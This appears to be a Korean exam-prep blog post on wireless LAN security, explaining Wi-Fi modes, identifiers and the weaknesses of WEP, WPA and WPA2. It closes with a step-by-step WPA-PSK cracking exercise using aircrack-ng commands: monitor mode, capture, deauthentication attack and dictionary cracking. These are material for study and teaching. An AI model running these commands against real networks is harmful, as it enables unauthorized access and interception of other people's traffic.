정보보안 자격증 + ISMS-P
[정보보안기사][실기] 무선랜 보안(Wireless LAN)
Always-Try
2021. 9. 27. 23:06
무선랜 구성 방식
더보기
1. Infrastructure 모드
- 각각의 단말기가 무선 AP를 통해 통신하고 단말기 서로 간에는 직접 통신을 하지 않는 방식
2. Ad-hoc 모드
- 각각의 단말기 간에 통신을 통해 무선 도달 범위를 넓히는 방식. AP를 사용하지 않음
SSID, BSS, BSSID, ESS, ESSID, DS, 비콘 프레임/메시지
더보기
1. SSID
- 무선랜 식별자
2. BSS
- 무선랜의 가장 기본적인 망 구성 단위(AP와 단말기)
3. BSSID
- BSS 식별자 (보통 무선 AP의 MAC 주소를 사용)
4. ESS
- 여러 BSS에 의해 구성된 네트워크
5. ESSID
- ESS 식별자
6. DS (Distribution System)
- 무선 AP가 연결 된 유선 네트워크
7. 비콘 프레임/메시지
- 무선 AP가 자신이 관리하는 무선랜(BSS)의 존재를 브로드캐스트 하는 메시지
무선랜 보안 기술
더보기
1. 접속 인증 기술
- SSID 숨김 설정
- MAC 주소 필터링
- 공유키 인증 (PSK:Pre-Shared Key)
- IEEE 802.1x/EAP(인증서버, RADIUS 이용)
2. 데이터 암호 기술
- WEP
- WPA, WPA2
WEP, WPA, WPA2
더보기
1. WEP
- 개요
- IV(24bit)와 고정된 공유키(40bit or 104bit)를 조합하여 암호키를 생성한 후 RC4 알고리즘을 기반으로 PRNG(수도 난수 발생기)에 입력하여 키스트림 생성
- 유선랜과 동등한 수준의 보안성 제공을 위해 탄생함
- 문제점
- IV와 공유키가 짧다. IV를 무작위로 생성하기 하지만 24bit라서 동일한 IV가 사용될 가능성이 있음
- 단방향 인증방식 제공으로 인한 취약성이 존재
- 고정된 공유키를 사용하여 1명이 털리면 다 털림
2. WPA
- 개요
- WEP의 문제점을 보완함
- IV의 크기를 24bit에서 48bit로 늘리고, RC4-TKIP 사용함
- 문제점
- 여전히 취약한 RC4 암호 알고리즘 사용
- TKIP 적용은 S/W 업그레이드를 이용하고 있기 때문에 S/W 처리에 따른 성능 지연 발생
- WEP의 문제점을 보완함
3. WPA2
- 개요
- AES-CCMP 암호방식 사용
- CCMP는 Counter모드 기반의 CBC-MAC을 결합한 CCM을 기반으로 함
- AES-CCMP 암호방식 사용
- WPA/WPA2의 인증방식
- PSK
- Pre Shared Key 즉, 미리 만든 패스워드를 공유하는 방식
- 패스워드를 짧게 설명하면 사전 공격(Dictionary Attack)을 통해 크래킹 당할 수 있음
- IEEE 802.1x/EAP
- EAP는 인증을 하는 프로토콜은 아니지만, 다양한 종류의 인증 방법을 전송하는 역할을 수행함
- Radius와 같은 인증 서버와 연동하여 인증 절차를 진행하는 방식임
- PSK
WPA-PSK 인증 패스워드 크래킹 실습
더보기
1. 도구
- aircrack-ng: 무선랜 모니터링, 크래킹, 분석 도구. 아래 프로그램들이 포함되어 있음
- airmon-ng: 무선랜 인터페이스를 모니터 모드로 전환하는 프로그램
- airodump-ng: 무선 패킷 덤프 뜨는 프로그램
- airreplay-ng: 무선 네티워크에 패킷을 재생성하는 프로그램
- airdecap-ng: 암호화된 패킷 덤프를 복호화 해주는 프로그램
2. 절차
- 무선랜 인터페이스 모니터 모드 활성화
- #iwconfig (무선랜 인터페이스 상태 확인)
- #airmon-ng start wlan0 (wlan0 인터페이스를 모니터 모드로 전환. 유선랜의 무차별모드(promiscuous와 같음)
- 무선랜 네트워크 덤프
- #airodump-ng wlan0mon
- #airodump-ng --bssid 00:08:9F~~~ -c 5 -w wpa wlan0mon
- -c 5: 대상 무선 AP의 채널
- -w wpa: 패킷 덤프파일의 접두어
- wlan0mon 패킷을 수집할 모니터 모드의 무선랜 인터페이스(모니터 모드 전환 시 인터페이스명이 변경됨)
- 무선 AP와 단말 간 재인증이 발생하도록 공격
- #airreplay-ng --deauth 100 -a 00:09:9F~~~ -c AC:EE:9E~~ wlan0mon
- --deauth 100: 인증해제 패킷 전송 횟수 (인증 해제 시, 자동으로 다시 재인증을 시도하므로 전송)
- -a: 대상 무선 AP의 BSSID
- -c: 대상 단말의 MAC 주소
- #airreplay-ng --deauth 100 -a 00:09:9F~~~ -c AC:EE:9E~~ wlan0mon
- 수집한 덤프 파일로 패스워드 크랙 수행
- #aircrack-ng -w ./DIC/pw.list wpa-01.cap
- 크랙한 패스워드를 이용한 무선전송 데이터 복호화
- airdecap-ng -p password -e TEST_AP wpa-01.cap